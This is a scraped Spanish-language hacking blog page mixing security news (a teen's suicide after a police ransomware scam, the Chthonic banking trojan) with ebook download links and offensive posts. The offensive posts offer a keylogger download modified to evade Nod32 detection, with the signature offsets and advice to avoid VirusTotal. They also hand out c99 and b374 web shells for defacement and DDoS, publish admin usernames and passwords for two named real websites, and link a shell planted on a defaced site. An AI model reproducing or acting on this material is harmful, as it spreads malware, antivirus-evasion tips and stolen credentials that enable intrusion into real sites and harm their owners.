Se ahorco después de recibir un ransomware




Ransomware amenaza de malware ha forzado a alguien por el terrible suicidio y una vez más ha marcado su historia por la sangre de alguien. Triste, pero es verdad!
Joseph Edwards, un escolar de 17 años de edad, de Windsor, Berkshire, se ahorcó después de recibir un correo electrónico falso que parecía ser de la policía alegando que había sido visto navegando en sitios web ilegales y que una multa de 100 libras se necesita para ser pagado con el fin para impedir que la policía de perseguirlo.
El correo electrónico de estafa del ransomware Policía conocido en el portátil del niño y también descargaron malware que encerró a su sistema una vez que se abrió.
Edwards era un estudiante de nivel A con autismo, discapacidades del desarrollo, que probablemente le hizo más susceptibles a creer el correo estafa Internet, supuestamente enviado desde la policía de Cheshire, era genuino, un juez de instrucción oyó el jueves.

*
Edwards estaba tan molesto y deprimido por la acusación y la demanda exorbitante que se ahorcó horas después de ser víctima de la amenaza crucial. Fue encontrado ahorcado en su casa familiar en Windsor por su madre Jacqueline Edwards, quien le dijo al juez de instrucción que probablemente no entendía las implicaciones de sus acciones.
"Él no parece tener ningún tipo de preocupaciones que yo conozco. Yo no creo que él realmente entiende," Jacqueline Edwards dijo el forense. "José fue objeto de una estafa en Internet, un enlace policial amenazante, falso que estaba pidiendo dinero", dijo su madre, en un comunicado. "Él lo habría tomado literalmente a causa de su autismo y no quería molestar a Georgia [su hermana] o yo."
Por lo que todos sabemos, un ransomware Policía de este tipo no cifra los archivos y por lo general hace una víctima que pagar una pequeña multa que duran alrededor de $ 200 o 200 €. Normalmente es mucho más fácil para eliminar la amenaza de los sistemas infectados mediante el uso de herramientas dedicadas especialmente diseñados para eliminar este tipo de infecciones.
De acuerdo con el sargento detective Peter Wall, será casi imposible rastrear los estafadores detrás del correo electrónico 'crudo', pero creen que puede tener su origen fuera del Reino Unido.
Esta no es la primera vez cuando ransomware se ha convertido en motivo mortal para quitarle la vida a alguien. Hace más de un año, una misma Policía amenaza ransomware familia rumana enfrentado y la víctima rumana ahorcó y sus cuatro años de edad, hijo, cicatrices que su hijo iba a pagar por su error y su vida sería pasar en el momento de la ilusión.
Ransomware es una de dinero haciendo esquemas del criminal más flagrante y evidente por ahí, de las cuales amenaza CryptoLocker había tocado el pico, y los ciberdelincuentes han desarrollado muchas versiones CryptoLocker (prisonlocker, de conexiones, icepole, cryptobit) por el cual usted tiene que proteger su sistema .

Fuente:The hacker news

Firebug Starter Book




Step 3 – selecting the element 14
Quick inspect 15
www.it-ebooks.info
Table of Contents
-------------------------------------------
Editing page components 15
Conclusion 16
Top 17 features you'll want to know about 17
Executing JavaScript on the fly 17
Command editor 18
Smart paste 18
Using Console API 18
console.log(object[, object, ...]) 18
console.debug(object[, object, ...]) 19
console.info(object[, object, ...]) 19
console.warn(object[, object, ...]) 19
console.error(object[, object, ...]) 19
console.assert(expression[, object, ...]) 20
console.dir(object) 20
console.dirxml(node) 20
console.trace() 20
console.group(object[, object, ...]) 20
console.groupCollapsed(object[, object, ...]) 20
console.groupEnd() 20
console.time(name) 20
console.timeEnd(name) 20
console.profile([title]) 21
console.profileEnd() 21
console.count([title]) 21
Modifying an HTML element's attribute on the fly 21
Adding a new attribute to an existing HTML element 22
Deleting an HTML element 23
Setting breakpoints on an HTML element 23
Inspecting cascading rules 25
Previewing colors and images 27
Tweaking CSS on the fly 27
Enabling and disabling CSS rules 29
JavaScript profiling 29
Columns and description of profiler 30
JavaScript debugging 31
Applying Script breakpoints 32
Applying conditional breakpoints 35
Inspecting DOM 37
Network monitoring 39
Description of information in the Net panel 40
Load-time bar color significance 40
Examining HTTP headers 42
Monitoring AJAX requests 43
Managing cookies 44
www.it-ebooks.info
Table of Contents
---------------------------------------------
People and places you should get to know 46
Official Sites 46
Articles and Tutorials 46
Community 46
Blogs 47
Twitter 47


Descargar:

http://www.mediafire.com/download/tut1uih9h8ibd62/Firebug+Starter.rar



Android Security Internals



Foreword by Jon Sawyer xvii
Acknowledgments . xix
Introduction xxi
Chapter 1: Android’s Security Model 1
Chapter 2: Permissions 21
Chapter 3: Package Management . 51
Chapter 4: User Management 87
Chapter 5: Cryptographic Providers 115
Chapter 6: Network Security and PKI . 145
Chapter 7: Credential Storage 171
Chapter 8: Online Account Management . 191
Chapter 9: Enterprise Security 215
Chapter 10: Device Security . 251
Chapter 11: NFC and Secure Elements 289
Chapter 12: SELinux 319
Chapter 13: System Updates and Root Access 349
Index . 377

Descargar:

http://www.mediafire.com/download/d8ytxzndz41kjn3/Android+Security+Internals1.rar

Hacker: ¿Cuánto ganan estos ciberdelincuentes?



De acuerdo con los expertos de la compañía Kapersky, por ataque perpetrado los ciberdelincuentes podrían ganar hasta 20 veces el costo de la operación.

No es un trabajo honesto, mucho menos lícito, pero te has preguntado: ¿cuánto gana un hacker por ataque perpetrado?
De acuerdo con los expertos de la compañíaKapersky, por ataque perpetrado los ciberdelincuentes podrían ganar hasta 20 veces el costo de la operación.
Por ejemplo, el coste medio por la compra y distribución de un virus "troyano móvil bloqueador" es de US$ 1.000. Considerando que por limpiar un smartphone de este virus, los atacantes cobran entre 10 y 200 dólares, podrían obtener US$ 20.000 si brindaran sus "servicios" por lo menos a 100 personas.
Si fuera el caso de crear una red social falsa, mediante una página de phishing, el costo sería de 150 dólares; sin embargo, si venden los datos robados de los usuarios (contactos, fotos, etc.), el hacker puede ganar hasta US$ 10.000.
Pero son los ataques bancarios de donde se obtiene más dinero. Tras haber fabricado el malware, el exploit y el mailing de spam, con un costo de US$ 3.000, el troyano bancario está listo para filtrarse en el sistema bancario. La ganancia para el hacker por esta operación es de aproximádamente 72 mil dólares, 24 veces el costo de la fabricación.
Fuente:rpp.com.pe

Penetration Testing with Perl




Penetration Testing with Perl
Preface
1. Perl Programming
2. Linux Terminal Output
3. IEEE 802.3 Wired Network Mapping with Perl
4. IEEE 802.3 Wired Network Manipulation with Perl
5. IEEE 802.11 Wireless Protocol and Perl
6. Open Source Intelligence
7. SQL Injection with Perl
8. Other Web-based Attacks
9. Password Crackin
10. Metadata Forensics
11. Social Engineering with Perl
12. Reporting
13. Perl/Tk


Descargar:


Limpiando keylogger


Este keylogger es muy viejo pueden ver en la descripción del video  que se subió hace como 4 años lo he estado modeando y le quite la firma del Nod32 para mi sorpresa salieron varias firmas jeje.




Descargar original:

http://www.mediafire.com/download/cb7wdy39p6q59y4/Keylogger.zip

Escaneado en  virustotal por que ya es antiguo  cuando un malware es nuevo y esta  limpio no se pasa por virustotal por distribuye muestras y a los dias seria detectado.

https://www.virustotal.com/es/file/6770713ac4566984c60c2c3dda72cbc57368aa0f142bd47d57bc210b77f1947f/analysis/1419521794/


La firma del Nod32 se encuentra entre los offset 7000-7010 eso es lo que yo utilize hay otros que también son funcionales



Pagina que no  distribuye muestras, espero que no lo pasen por virustotal si no se quemaría rápido.



Descargar Limpio:

http://www.mediafire.com/download/hhb1d2w2j44i6qo/LogLimpio.rar

Practical Cryptography Algorithms and Implementations Using C++





Código:
Contents
Preface ix
Acknowledgments xi
About the Editors xiii
Contributors xvii
Chapter 1 B asics of Security and Cryptography 1
AL-SAKIB KHAN PATHAN
Chapter 2 C lassical Cryptographic Algorithms 11
SHEIKH SHAUGAT ABDULLAH AND SAIFUL AZAD
Chapter 3 R otor Machine 35
SHEIKH SHAUGAT ABDULLAH AND SAIFUL AZAD
Chapter 4 B lock Cipher 45
TANVEER AHMED, MOHAMMAD ABUL KASHEM,
AND SAIFUL AZAD
Chapter 5 D ata Encryption Standard 57
EZAZUL ISLAM AND SAIFUL AZAD
Chapter 6 A dvanced Encryption Standard 91
ASIF UR RAHMAN, SAEF ULLAH MIAH, AND
SAIFUL AZAD
viii Contents
Chapter 7 A symmetric Key Algorithms 127
NASRIN SULTANA AND SAIFUL AZAD
Chapter 8 T he RSA Algorithm 135
SAAD ANDALIB AND SAIFUL AZAD
Chapter 9 E lliptic Curve Cryptography 147
HAFIZUR RAHMAN AND SAIFUL AZAD
Chapter 10 M essage Digest Algorithm 5 183
BAYZID ASHIK HOSSAIN
Chapter 11 S ecure Hash Algorithm 207
SADDAM HOSSAIN MUKTA AND SAIFUL AZAD
Chapter 12 F undamentals of Identity-Based
Cryptography 225
AYMEN BOUDGUIGA, MARYLINE LAURENT, AND
MOHAMED HAMDI
Chapter 13 S ymmetric Key Encryption Acceleration
on Heterogeneous Many-Core
Architectures 251
GIOVANNI AGOSTA, ALESSANDRO BARENGHI,
GERARDO PELOSI, AND MICHELE SCANDALE
Chapter 14 M ethods and Algorithms for Fast
Hashing in Data Streaming 299
MARAT ZHANIKEEV

Descargar:



Malware que ataca sistemas de banca online

Una nueva e importante amenaza de malware dirigido a sistemas de banca en línea y a sus clientes ha sido detectada por los analistas de seguridad de Kaspersky Lab. Identificado como una evolución del Troyano Zeus, Trojan-Banker.Win32.Chthonic, o Chthonic para abreviar, se sabe que ha afectado a más de 150 bancos diferentes y 20 sistemas de pago en 15 países, y parece estar destinado principalmente a atacar a instituciones financieras en el Reino Unido, España, Estados Unidos, Rusia, Japón e Italia.






Aunque Chthonic aún no ha sido detectado en Latinoamérica, Dmitry Bestuzhev, director del equipo de investigación y análisis para Kaspersky Lab América Latina, piensa que su aparición en la región es solo una cuestión de tiempo. “Como lo hemos visto antes con otras amenazas, anticipamos que Chthonic se expandirá hacia nuestra región pero de la mano de cibercriminales locales que adoptarán las técnicas o comprarán las tecnologías de los que están detrás de este malware para difundirlo a nivel regional. Dichos esquemas de delinquir son muy populares en nuestra región e inclusive, se han utilizado hasta con el mismo troyano bancario Zeus”, señaló.

Chthonic aprovecha funciones de las computadoras como la cámara web y el teclado para robar credenciales bancarias en línea tales como contraseñas guardadas. Los atacantes también pueden conectarse a la computadora de forma remota y ordenarle que lleve a cabo las transacciones.

Sin embargo, el arma principal de Chthonic es la inyección vía web. Esto permiten al Troyano insertar su propio código e imágenes en las páginas del banco que carga el navegador de la computadora, lo que le permite a los atacantes obtener el número de teléfono de la víctima, las contraseñas de un solo uso y números PIN, así como los detalles de inicio de sesión y contraseña introducidos por el usuario.

Las víctimas se infectan a través de enlaces web o archivos adjuntos de correo electrónico que contienen un documento con la extensión .DOC el cual establece una “puerta trasera” para el código malicioso. El archivo adjunto contiene un documento RTF especialmente diseñado para aprovechar la vulnerabilidad CVE-2014-1761 en productos de Microsoft Office.

Una vez descargado, el código malicioso que contiene un archivo de configuración cifrado se inyecta en el proceso msiexec.exe y se instalan varios módulos maliciosos en la máquina.

Hasta ahora Kaspersky Lab ha descubierto módulos que pueden recoger información del sistema, robar contraseñas guardadas, registrar teclas pulsadas, permitir el acceso remoto, y grabar vídeo y sonido a través de la cámara web y el micrófono, en caso que la computadora incluya esas funciones.

En el caso de uno de los bancos japoneses atacados, el malware es capaz de ocultar las advertencias del banco e inyectar, en cambio, un script que permite a los atacantes realizar diversas transacciones utilizando la cuenta de la víctima.

Los clientes afectados de los bancos rusos son recibidos por páginas bancarias totalmente fraudulentas tan pronto como inician la sesión. Esto se logra mediante el Troyano que crea un iframe con una copia de phishing del sitio web que tiene el mismo tamaño que la ventana original.

Chthonic comparte algunas similitudes con otros Troyanos. Utiliza el mismo archivo cifrador y de descarga que Andrómeda, el mismo esquema de cifrado que los Troyanos Zeus AES y Zeus V2, así como una máquina virtual similar a la usada en ZeusVM y el malware KINS.

Afortunadamente, muchos fragmentos del código utilizado por Chthonic para realizar inyecciones web ya no se pueden utilizar, debido a que los bancos han cambiado la estructura de sus páginas y, en algunos casos, también los dominios.

“El descubrimiento de Chthonic confirma que el Troyano ZeuS sigue evolucionando. Los autores de malware están haciendo pleno uso de las técnicas más modernas, auxiliados considerablemente por la filtración del código fuente de ZeuS. Chthonic es la siguiente fase en la evolución de ZeuS. Utiliza el cifrado de Zeus AES, una máquina virtual similar a la utilizada por ZeusVM y KINS, y el descargador de Andrómeda – para atacar cada vez más instituciones financieras y a sus clientes inocentes de formas cada vez más sofisticadas. Creemos que sin duda aparecerán nuevas variantes de ZeuS en el futuro, y nosotros continuaremos rastreando y analizando cualquier amenaza para mantenernos un paso por delante de los ciberdelincuentes”, dijo Yury Namestnikov, Analista Senior de Malware en Kaspersky Lab y uno de los investigadores que trabajó en la investigación de la amenaza.


Fuente:portinos.com

2 Shell Up


Les dejo dos shell  la c99shell 1.0 y b374 2.8  para defacear o hacer un ataque ddos solo agregen sus victimas :) hay que subirla en el servidor de la web hackeada.







Descargar:



Login Admin Hackeado




Para subir shell no modifiquen nada -_-

Web

Login Admin

http://www.embroidered-printed-clothing.co.uk/login.php

Username: Justin
Password: jlcb599516


http://vecinitas.com.ve/admin/login.php

Usuario: luis
Contraseña: 12345

Thanks 12Glitch13

¿Quién es la “Barbie Hacker Feminista”?





Entre los miles de productos de Barbie que existen en este planeta está un libro ilustrado que lleva como título Barbie: I Can be a Computer Engineer (traducido es algo como Barbie: yo puedo ser una ingeniera en computación). Dicho libro ha recibido montones de críticas en Internet por tratarse de un contenido que –ante la percepción de muchos– utiliza el estereotipo de la forma en que las mujeres supuestamente entienden (o más bien no entienden) la industria tecnológica.

En el libro, Barbie le pide ayuda a sus dos amigos hombres para arreglar problemas o completar proyectos, infecta la computadora de su hermana y dice cosas como “Yo sólo estoy haciendo las ideas de diseño”. Algo dudoso para un libro que se supone debe inspirar a las niñas, ¿no? Ofensivo o no, ante este material surgió una divertida respuesta en Internet: memes de “Feminist Hacker Barbie”.

Esta Barbie Hacker Feminista fue idea de una programadora californiana llamada Kathleen, pues ante la frustración que sintió al ver el libro, creó un sitio para que la gente vuelva a escribir las páginas con cosas que no hacen quedar a Barbie como una inútil que obtiene crédito por cosas que no hizo. Las imágenes originales son perfectas para editar porque en realidad no tienen sentido y quedan casi con cualquier frase genuinamente geek que se les pueda ocurrir.

Aquí les dejamos algunos de los memes más divertidos; si quieren hacer los suyos, simplemente visiten el sitio creado por Kathleen.









… Y aquí un ejemplo de alguien aún mejor que la Barbie Hacker Feminista.


Fuente:unocero.com


¿Dónde aprendieron los 'hackers' a ser 'hackers'? (IV)




Internet ha cambiado en los últimos veinte años, pero no tanto como podría parecer. Si miramos de cerca su código, cual Matrix, vemos que muchas cosas siguen siendo en esencia las mismas, sólo han mutado las herramientas: lo que antes era una BBS hoy sería, salvando las distancias, Facebook. Y Twitter, una mezcla de chat y lista de correo personalizada. En cuanto a las revistas electrónicas o 'ezines', tendrían la función que hoy tiene un blog. Y, así como no hay prácticamente colectivo en Internet que hoy no tenga su 'blog', tampoco en los años 90 había prácticamente grupo de 'hackers' que no tuviese su propia 'ezine': 29A, JJF.. e incluso revistas sin grupo, como NetSearch y 7a69ezine.



Aparte de las más conocidas en la escena hacker española, SET yRaregazz, otras ezines ofrecían la suficiente calidad para ser recordadas. La mayoría pueden leerse aún, o descargarse, en repositorios como Govannom, Austistici o la Comunidad Underground de México. En este último sitio se almacenan las principales ezines de los viejos grupos 'hacker' mexicanos, entre ellos Raza Mexicana, RTM y Mexican Hackers Mafia. Pegarles un vistazo puede llenar un sábado tarde o noche aburrido pues junto al tema técnico, que es el que echa más para atrás al lego, hay textos filosóficos que enseñan mucho sobre la cultura 'hacker', también textos de humor e incluso política.

Entre las 'ezines' interesantes hechas desde España, que no en castellano (en inglés), destaca la del grupo 29A, el mejor colectivo 'hacker' que hayamos visto por estas tierras. Su pericia como programadores de virus los catapultó a la escena internacional, que lideraron, y pronto se les unió gente de toda Europa, aunque el liderazgo fue siempre español. Su 'ezine' se conserva en su página web. Otra ezine destacable fue la del grupo JJF Hackers Team conocidos por ser los primeros que usaron el término "hacker blanco" en España y también por haber montado la NoConName. La revista aparece en 1997, con colaboradores de lujo como Nobody e IPgh0st.





Una ezine más peculiar fue la del grupo CatHack, la única escrita en catalán, que aparece a finales de 1998. Su editor era Pop.tPH, hoy conocido como @trufae, autor de Radare, una "suite" de programas para la ingeniería inversa famosa a nivel internacional. El resto del equipo fundador lo formaban Barner, Asef y PGB. CatHack era una de las pocas ezines hackers que, junto con Raregazz, se declaraba abiertamente hacktivista. Otra ezine para el recuerdo fue la del grupo Disidents (http://hackstory.net/Disidents), que llegó a los ocho números aunando colaboradores de ambos lados del Atlántico.

En 1999 nace la ezine NetSearch, a iniciativa de Ulandron, del grupoUndersec. Pero NetSearch no será la típica revista de grupo: en ella escribirán miembros de Undersec y también habituales del canal de chat #netsearch: DarK_FeaR, Sp4rc, cafo, [LsD]-MT, Raise, }Moeb|uZ{, Quasar, P0p3, Hander, kekabron, Chui, Hardcode, GamerX, P0TH, Freedom, HuFaKLF, extremoduro, |anillo|, Chapulino, Maniac o el malogrado Doing. Hoy el proyecto Netsearch sigue en pie (http://www.netsearch-ezine.net) gracias a MegadetH.

También en 1999 aparece 7a69ezine, de la mano de Ripe y que llegará a la friolera de 14 números, con colaboraciones de conocidos hackers como |CoDeX|, Doing, Tahum, OverDrive, tuxisuau, Bruj0, Iam, Pluf, Pancake, QuasaR o esn-min. En ella pueden leerse, entre otras, las crónicas del fin de la escena hacker de los 90, como un artículo firmado por el 'staff' en 2002:


"¿Panorama del under actual? Pues que decir, de momento sigue como siempre bastante parado, al menos de cara al publico. SET parece que se ha estabilizado; ha superado la torta que les dieron y el pobre número #25 anunciando la salida de un próximo numero que debería salir a finales de Octubre. NetSearch sigue siendo una incógnita total, tras anunciar su retirada y su vuelta en alguna ocasión parece que la ultima palabra manifiesta un retorno de estos, tendremos que esperar a ver que pasa. Otros 'ezines', como DTF, parece que no acaban de despegar del todo (sabemos que los inicios, e incluso el mantenerse, son muy complicados, Animos!). En cuanto a Hispahack, basta con decir que la web sigue prácticamente igual que cuando la inauguraron, con la diferencia de la actividad en los foros (que ha disminuido), foros que tuvieron que cerrar durante unos días debido a una vulnerabilidad en los mismos. Esperamos ver pronto buen trabajo de todos ellos"


Tres años antes, otro artículo en 7a69ezine explica cuáles son los principales canales de chat que sirven de punto de reunión de la escena 'hacker' española e hispana. Y es que si las 'ezines' eran los libros de texto de los 'hackers', las salas de 'chat' eran sus aulas. Sobre el 'chat' versará la siguiente entrega de esta serie.

Fuente:elmundo.es



¿Dónde aprendieron los 'hackers' a ser 'hackers'? (III)



Imagine cómo aprendería usted algo que está sucediendo ahora mismo, para lo que no hay maestros ni medios de comunicación de masas que lo retransmitan, y cuyo conocimiento está sólo al alcance de una élite. Un importante paso, posiblemente, sería unirse a otros para ayudarse mutuamente. De esta manera cada uno o una podría especializarse en una cosa y enseñarla al resto. Lo siguiente sería crear las plataformas adecuadas para que cuanta más gente posible pudiese acceder al nuevo conocimiento. Esto sucedió en los años 90 del siglo pasado con las nuevas tecnologías. Y una de las plataformas que aquellos 'hackers' ansiosos, estudiantes adictos, más usaron fueron los boletines electrónicos o 'ezines'. Seguimos.


Hablábamos la semana pasada de la 'ezine' Saqueadores Edición Técnica, nacida en Murcia, uno de los principales exponentes de esta forma de comunicación y educación en lengua castellana. Pero hubo más. Junto a "Saqueadores" brilla también RaregaZz, creada en México por alguien apodado Raretrip. Raregazz aglutinó a 'hackers' de ambos lados del charco, con un potente núcleo español, y se ganó el respeto de la comunidad por la calidad de sus artículos. El principal artífice de ello fue el alicantino Guybrush, quien cogió el timón de la'ezine' a finales de 1997.




Raregazz nació en febrero de 1997 y publicó 19 números, hasta 2002, lo que es todo un récord en un contexto donde las 'ezines'no solían pasar de los 5 números. Se distribuía a través de una lista de correo y posteriormente en el sitio web oficial, que cambió diversas veces de sitio. Guybrush explica por qué: "Costaba mucho encontrar alojamiento gratuito y además estaba bastante vetado todo el contenido de 'hacking'". Actualmente pueden visitarse fragmentos de la web de Raregazz gracias al sitio Archive.org: enhttp://web.archive.org/web/*/http://raregazz.acapulco.uagro.mx/* yhttps://web.archive.org/web/20040519045649/http://www.raregazz.org/. Además, la 'ezine' puede consultarse completa en diversas bases de datos, como Govannom o el servidor italiano Autistici.

Del fundador de Raregazz, Raretrip, hay muy poca información, excepto que era mexicano y políticamente comprometido. Según contaba él mismo en el primer número, su intención al crear la 'ezine'era liberar la información sobre 'hacking' de los nichos "elitistas". Además, le interesaba mucho el hacktivismo y cómo este podía ayudar a la lucha zapatista, entonces en pleno apogeo. Así lo explicaba en el texto "Requiem para RareGaZz", tres años después de fundar la revista: "Creiamos que encontrariamos dentro de esta zona llamada internet la utopia que Marx no pudo en la "realidad". Creimos eso y nos valio incluir textos sobre filosofia (...) y muchas otras materias que nada tenian que ver con la escena hacker excepto el tratar de crear conciencia usando como instrumento a la tecnologia. Funcionó".

Otro punto que distingue a esta 'ezine' es la mezcolanza de nacionalidades que pasaron por ella, como explica uno de sus últimos editores, el peruano Alonso ReYDeS: "Empieza como un grupo mexicano y termina siendo un grupo Latinoamericano o Hispano, dado que teníamos miembros de México, Argentina, Bolivia, Uruguay, Perú, España y Chile. El coordinar las reuniones vía chat era un poco complicado, dado que hablamos de gente en España y Latinoamérica. Había que encontrar horas que la gente estuviera lúcida y coordinar horarios para reuniones de casi el 100% de integrantes algunas veces era imposible".

En los primeros números escribían sólo RareTrip y KillerBot. Más adelante se les unieron Le PompeItor, Mr. X y, como colaboradores,Serverhacker, Raven Spirit, DuvaHazard, Dark Raver, Psycho Tranze, sir francis drake, Cracksmoker, Arkangel, Orion, Groovy, Carlos Truco, Yo, TucanX y NiK. La ezine, como muchas otras en su infancia, publicaba desde tutoriales básicos de hacking hasta humor y textos anarquistas. En aquellos primeros tiempos Raregazz se integraba dentro del grupo Red del Kaos, cuyo líderCrackSmoker escribía: "Somos un grupo de terroristas -si asi es- encargados de causar KaoS en los sistemas mexicanos reclamando democracia, libertad política y sobre todo una mayor apertura a los grupos sociales como Rdk en los medios de comunicación para transmitir nuestras ideas".

Era típico de las 'ezines' 'hacker' que en sus inicios se publicasen muy seguido, cada mes o incluso antes, para después alargar los periodos entre número y número y aparecer una vez al año o de forma mucho más irregular. Raregazz llevaba 7 números y aún estábamos en 1997 cuando Guybrush escribió su primer artículo. Guybrush es el primer español que entra en el equipo editorial y con él se inicia el desembarco español en la revista, que consolida su apertura al hacking más técnico. Con Guybrush llegarán colaboraciones de grupos de aquí como Underhack, JJF Hackers Team o TDD y un elevado número de colaboradores: Pata, Azumlord, Yo_Soy (quien más adelante se unirá al grupo Raza Mexicana), VoraX, 12r43lOverdrive, Nobody (uno de los organizadores de la primeraNoConName en Mallorca), Sebastián Quiroga, SlimeLORD, O'Flaherty, Senpai, Lobo, Ironbox, Cytorax, Mr.Nexus, Barbwired, Freedom, ZeD y un largo etcétera.

Entre 1998 y 2000 Raregazz vive su momento más fecundo. Pero en marzo de 2001 Guybrush anuncia, en la 'ezine' NetSearch, que abandona el barco por "diferencias con el resto". Guybrush se queja de que "la gente de ahora es demasiado cool y nada más que quiere ser conocido y pertenecer a un grupo bueno pero nadie quiere trabajar (...). Supongo que raregazz ha muerto. Nadie tiene ganas de trabajar, tan solo quieren aparentar, tomar decisiones y mandar pero sin hacer nada a cambio". El último equipo editorial en el que aparece Guybrush lo forman él mismo, Raretrip, Alt3kx_h3z, enan0, y0ni, Yo_Soy, ReYDeS, Ocsic, Cytorax y ^Shadown^. Un año después, el 27 de marzo de 2002, aparece el último número.

Cabe destacar de Raregazz que la calidad técnica no estuvo reñida con su compromiso 'hacktivista': desde los primeros números, cuando se convoca un 'ciberataque' contra el Instituto Federal Electoral mexicano; hasta los últimos, cuando se da voz al principal grupo 'hacktivista' mexicano, X-Ploit. Después de la fiestas navideñas de 1997, Raregazz reproduce íntegramente el famoso 'Comunicado del EZLN sobre la guerra en Chiapas México' que sacude al primer mundo. De hecho, sospecha Guybrush, Raretrip y sus amigos podrían haberse ido de Raregazz para formar parte de X-Ploit: "En mi opinión lo de los fundadores creo que era más una lucha política y por esa época había otro grupo mexicano sin web pero bastante activo y conocido por atacar páginas del gobierno mexicano (X-ploit team)...raro es que todos desaparecieran de golpe".

Fuente:elmundo.es

Shell gratis





Aquí les regalo esta web con shell para que suban sus shell booter o lo que quieran, si quieren pueden defacear xD
Autor:12Glitch13



Deface web con shell

http://www.lacoloniadigital.com.uy/noticias/12Glitch13.php

Web original

http://www.lacoloniadigital.com.uy

PERUHACK 2014

Expertos y ponentes del próximo evento PERUHACK 2014, en Lima, responden sobre los conocimientos y capacidades necesarios para ser denominado “hacker”.





detalles técnicos.

LAS EMPRESAS ESTÁN EN PELIGRO

“No hay el conocimiento suficiente dentro de las personas en las organizaciones respecto a los problemas de seguridad (informática)”, señala Walter Cuestas, Gerente de Open Sec y experto en Hacking Ético. “Aunque la información es abundante con respecto a cómo se llevan a cabo los ataques (de hackers) no es algo que se difunda tanto”.

“Si uno comienza a hacer testing (pruebas) en una compañía, va a encontrar ‘X’ fallas en su sistema que cualquier profesional del hacking va a poder vulnerar”, acota Miguel Torres, quien asegura que las empresas se encuentran en bastante peligro si no toman conciencia de las capacidades de los hackers actualmente.

Así, ambos expertos concuerdan en que se tiene que conocer mejor sobre cómo se lleva la “seguridad ofensiva” que la “seguridad defensiva”. Es decir, las compañías deben saber cómo atacan los hackers primero; para después analizar las protecciones que pueden establecer.

Acerca de PERUHACK 2014

Es un evento de in-seguridad informática y hacking en Perú dedicado por completo a mostrar técnicas de hacking, computación forense y seguridad ofensiva.

Contará con la participación de reconocidos hackers peruanos y extranjeros, y se realizará esteviernes 21 de noviembre en el campus de la UPC de Monterrico. Para más información acerca de los ponentes y detalles del evento, puedes ingresar a su página web.

Fuente: peru.com

Proxy List 05.11.14 + Vip Socks 5





Un proxy es un programa o dispositivo que realiza una tarea acceso a Internet en lugar de otro ordenador. Un proxy es un punto intermedio entre un ordenador conectado a Internet y el servidor que está accediendo. Cuando navegamos a través de un proxy, nosotros en realidad no estamos accediendo directamente al servidor, sino que realizamos una solicitud sobre el proxy y es éste quien se conecta con el servidor que queremos acceder y nos devuelve el resultado de la solicitud.


Descargar Proxy List

Kali Linux Network Scanning Cookbook




Table of Contents
Preface 1
Chapter 1: Getting Started 7
Configuring a security lab with VMware Player (Windows) 7
Configuring a security lab with VMware Fusion (Mac OS X) 13
Installing Ubuntu Server 16
Installing Metasploitable2 20
Installing Windows Server 22
Increasing the Windows attack surface 24
Installing Kali Linux 27
Configuring and using SSH 31
Installing Nessus on Kali Linux 35
Configuring Burp Suite on Kali Linux 39
Using text editors (VIM and Nano) 42
Chapter 2: Discovery Scanning 45
Using Scapy to perform layer 2 discovery 49
Using ARPing to perform layer 2 discovery 58
Using Nmap to perform layer 2 discovery 63
Using NetDiscover to perform layer 2 discovery 66
Using Metasploit to perform layer 2 discovery 69
Using ICMP ping to perform layer 3 discovery 73
Using Scapy to perform layer 3 discovery 78
Using Nmap to perform layer 3 discovery 87
Using fping to perform layer 3 discovery 90
Using hping3 to perform layer 3 discovery 94
Using Scapy to perform layer 4 discovery 100
Using Nmap to perform layer 4 discovery 111
Using hping3 to perform layer 4 discovery 115
ii
Table of Contents
Chapter 3: Port Scanning 125
UDP port scanning 126
TCP port scanning 126
UDP scanning with Scapy 129
UDP scanning with Nmap 136
UDP scanning with Metasploit 140
Stealth scanning with Scapy 145
Stealth scanning with Nmap 153
Stealth scanning with Metasploit 160
Stealth scanning with hping3 167
Connect scanning with Scapy 170
Connect scanning with Nmap 178
Connect scanning with Metasploit 184
Connect scanning with Dmitry 192
TCP port scanning with Netcat 195
Zombie scanning with Scapy 199
Zombie scanning with Nmap 204
Chapter 4: Fingerprinting 209
Banner grabbing with Netcat 211
Banner grabbing with Python sockets 213
Banner grabbing with Dmitry 217
Banner grabbing with Nmap NSE 220
Banner grabbing with Amap 221
Service identification with Nmap 224
Service identification with Amap 226
Operating system identification with Scapy 230
Operating system identification with Nmap 237
Operating system identification with xProbe2 238
Passive operating system identification with p0f 241
SNMP analysis with Onesixtyone 244
SNMP analysis with SNMPwalk 245
Firewall identification with Scapy 247
Firewall identification with Nmap 262
Firewall identification with Metasploit 264
Chapter 5: Vulnerability Scanning 269
Vulnerability scanning with Nmap Scripting Engine 270
Vulnerability scanning with MSF auxiliary modules 276
Creating scan policies with Nessus 280
iii
Table of Contents
Vulnerability scanning with Nessus 283
Command-line scanning with Nessuscmd 288
Validating vulnerabilities with HTTP interaction 291
Validating vulnerabilities with ICMP interaction 293
Chapter 6: Denial of Service 297
Fuzz testing to identify buffer overflows 298
Remote FTP service buffer overflow DoS 302
Smurf DoS attack 305
DNS amplification DoS attack 309
SNMP amplification DoS attack 320
NTP amplification DoS attack 330
SYN flood DoS attack 332
Sock stress DoS attack 339
DoS attacks with Nmap NSE 344
DoS attacks with Metasploit 348
DoS attacks with the exploit database 354
Chapter 7: Web Application Scanning 359
Web application scanning with Nikto 360
SSL/TLS scanning with SSLScan 363
SSL/TLS scanning with SSLyze 366
Defining a web application target with Burp Suite 369
Using Burp Suite Spider 371
Using Burp Suite engagement tools 373
Using Burp Suite Proxy 375
Using the Burp Suite web application scanner 376
Using Burp Suite Intruder 378
Using Burp Suite Comparer 381
Using Burp Suite Repeater 382
Using Burp Suite Decoder 386
Using Burp Suite Sequencer 387
GET method SQL injection with sqlmap 390
POST method SQL injection with sqlmap 394
Requesting a capture SQL injection with sqlmap 397
Automating CSRF testing 399
Validating command injection vulnerabilities with HTTP traffic 402
Validating command injection vulnerabilities with ICMP traffic 404
iv
Table of Contents
Chapter 8: Automating Kali Tools 407
Nmap greppable output analysis 407
Nmap port scanning with targeted NSE script execution 410
Nmap NSE vulnerability scanning with MSF exploitation 413
Nessuscmd vulnerability scanning with MSF exploitation 416
Multithreaded MSF exploitation with reverse shell payload 419
Multithreaded MSF exploitation with backdoor executable 422
Multithreaded MSF exploitation with ICMP verification 424
Multithreaded MSF exploitation with admin account creation 426
Index 429


Descargar:



Kali Linux CTF Blueprints





Table of Contents
Preface 1
Chapter 1: Microsoft Environments 7
Creating a vulnerable machine 8
Securing a machine 8
Creating a secure network 9
Basic requirements 9
Setting up a Linux network 9
Setting up a Windows network 9
Hosting vulnerabilities 10
